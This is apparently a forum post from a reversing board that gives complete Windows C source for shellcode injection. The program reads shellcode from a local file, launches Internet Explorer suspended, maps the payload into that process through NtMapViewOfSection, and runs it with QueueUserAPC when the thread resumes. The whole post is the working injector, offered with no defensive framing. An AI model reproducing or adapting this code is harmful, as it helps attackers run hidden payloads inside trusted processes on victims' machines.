kLoEr - Coding & Reversing

原作者：yogle

#define _WIN32_WINNT 0x0400
#include <windows.h>

typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT
{
 ViewShare = 1,
 ViewUnmap = 2
} SECTION_INHERIT;

typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*,
                SECTION_INHERIT, ULONG, ULONG );

func_NtMapViewOfSection NtMapViewOfSection = NULL;

LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh,
        DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )  
{
 NTSTATUS Status;
 LARGE_INTEGER SectionOffset;
 ULONG ViewSize;
 ULONG Protect;
 LPVOID ViewBase;

 // Convert the offset
 SectionOffset.LowPart = dwFileOffsetLow;
 SectionOffset.HighPart = dwFileOffsetHigh;

 // Save the size and base
 ViewBase = lpBaseAddress;
 ViewSize = dwNumberOfBytesToMap;

 // Convert flags to NT Protection Attributes
 if (dwDesiredAccess & FILE_MAP_WRITE)
 {
  Protect  = PAGE_READWRITE;
 }
 else if (dwDesiredAccess & FILE_MAP_READ)
 {
  Protect = PAGE_READONLY;
 }
 else if (dwDesiredAccess & FILE_MAP_COPY)
 {
  Protect = PAGE_WRITECOPY;
 }
 else
 {
  Protect = PAGE_NOACCESS;
 }

 // Map the section
 Status = NtMapViewOfSection(hFileMappingObject, hProcess, &ViewBase, 0, 0, &SectionOffset, &ViewSize, ViewShare, 0, Protect);
 if (!NT_SUCCESS(Status))
 {
  // We failed
  return NULL;
 }

 // Return the base
 return ViewBase;
}

int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
 HMODULE hDll = LoadLibrary( "ntdll.dll" );

 NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");

 // Getting a shellcode, use whatever you want
 HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

 HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);

 // Starting target process
 STARTUPINFO st;
 ZeroMemory (&st, sizeof(st));
 st.cb = sizeof (STARTUPINFO);

 PROCESS_INFORMATION pi;
 ZeroMemory (&pi, sizeof(pi));

 CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);

 // Injecting the shellcode into target process address space
 LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);

 // Create a new APC which will be executed at first when the thread resume
 QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);

 ResumeThread (pi.hThread);

 CloseHandle (hFile);
 CloseHandle (hMappedFile);
 CloseHandle (pi.hThread);
 CloseHandle (pi.hProcess);
 return 0;
}